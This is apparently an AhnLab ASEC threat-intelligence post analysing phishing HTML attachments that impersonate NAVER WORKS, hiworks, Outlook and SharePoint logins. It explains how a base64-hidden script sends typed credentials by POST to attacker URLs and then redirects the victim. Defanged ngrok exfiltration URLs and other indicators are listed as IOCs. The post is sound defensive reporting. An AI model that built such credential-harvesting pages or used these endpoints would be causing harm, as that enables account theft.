Phishing Script Files Being Distributed by Impersonating Various Groupware

The ASEC analysis team introduced ‘phishing websites targeting Korean email service users’ last year May through the TI analysis report and ASEC blog post. The team showed back then how the attackers leaked user credentials targeting users of NAVER WORKS, MAILPLUG, hiworks, Chollian, and Daum.

Files that disguise themselves as company groupware login webpage to leak user account credentials are one of the common phishing types that have been distributed, with slight changes occurring in email title, content, name of the attached file, script code, etc.

Current attackers also disguise their files as the groupware products that Korean users use often, but this time they are using a simpler method of changing the name of the same script file to make it fit for each recipient. The team also found multiple files impersonating NAVER WORKS, hiworks, Microsoft Outlook, and Microsoft SharePoint by using similar script code formats.

The table below shows the name of the files that have been found so far and the date they were discovered. Most of the file names include company names and their types have various formats such as requests for quotation, purchase orders, contracts, and order forms. Among them, the two files are notable in that each changed the company name at least 5 times before they were distributed. Some files exist in VirusTotal Result, but as it was found that they were not detected by other companies at all, it is highly likely that users might mistake them as normal files.

For instance, the files that are distributed may have the same hash but different names, such as ‘** Science_positive request form.htm,’ ‘** Ecotech.htm,’ and ‘** Factory (Inc.) request for quotation.htm’. There have been also cases of script files with different hashes and similar formats being distributed with the same file name. The malicious part of the script will be discussed in more detail in the bottom part of this post.

File NameDateFile NameDate
PO2648357.htm
(Used an abbreviated form of Purchase Order, P.O)
December 20th, 2021
December 22nd, 2021
** Ecotech.htmJanuary 26th, 2022
** Factory (Inc.) request for quotation.htmDecember 24th, 2021authenticationsharepointazon.htmJanuary 11th, 2022
** Technology (Inc.) (order list.htmDecember 28th, 2021(Inc.) ** Tech (inquiry for quotation).htmDecember 20th, 2021
December 27th, 2021
January 19th, 2022
January 20th, 2022
** Industry (Inc.) contract.htmJanuary 4th, 2022** Science_positive request form.htmDecember 17th, 2021
January 23rd, 2022
** Industry. (order form).htmJanuary 19th, 2022(Inc.) ** request for quotation (20210608).htmJanuary 14th, 2022
January 25th, 2022
January 26th, 2022
DOC Q0017 3509.htmlJanuary 24th, 2022**** Technology (Inc.)(order form).htmDecember 29th, 2021
January 4th, 2022
January 6th, 2022
Table 1. Name and discovered date of distributed files

When you open the HTML file attached in the phishing mail, you will find a login page impersonating one of various groupware as shown below. As it is difficult to distinguish between normal web pages and fake ones, users should take extreme caution.

Figure 1. Phishing files disguised as various groupware (1)

Figure 2. Phishing files disguised as various groupware (2)

Figure 3. Script inside the file that is disguised as NAVER WORKS groupware

Comparing the script code of the phishing file with that of NAVER WORKS normal login page in the text editor shows that the script code shown above is added to the bottom part.

The part that uses the JavaScript atob method has the variable d declared with the URL for stealing account credentials encoded with Base64. The code shows how the data is sent to the URL for leaking account credentials through the HTTP POST method when users enter their IDs and passwords. Also, for the part that uses windows.location.replace, the attacker makes the users redirect to the normal groupware webpage shown below so that they do not realize they have just visited phishing websites.

The attacker differentiated URLs for leaking account credentials as shown below. It is likely that he or she did so to know which webpage the acquired account credentials were entered. In fact, there have been multiple reports of ngrok.io platform’s domains being used for phishing since last year.

  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
  • hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php

As users might be confused because normal groupware images are used, they should still refrain from entering account credentials in webpages accessed by attached files of emails. If you received a suspicious email and are using the groupware mentioned in that email, it is recommended to check by logging in from the official groupware webpage through the web browser.

You should also update the anti-malware that you use to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the malicious script files introduced in the post using the aliases below.

[File Detection]
Phishing/HTML.Generic.S1713

[IOC]
0ac973a960c95ac3e5bd1f474098f635
hxxps://no1webmaster.com/alvin.php
hxxps://supraenagy.ml/wan.php
hxxps://simcaadvertising.com/most.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php
hxxps://1749-185-38-142-187.ngrok.io/narnia/mekus_worksmobile.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

3.5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments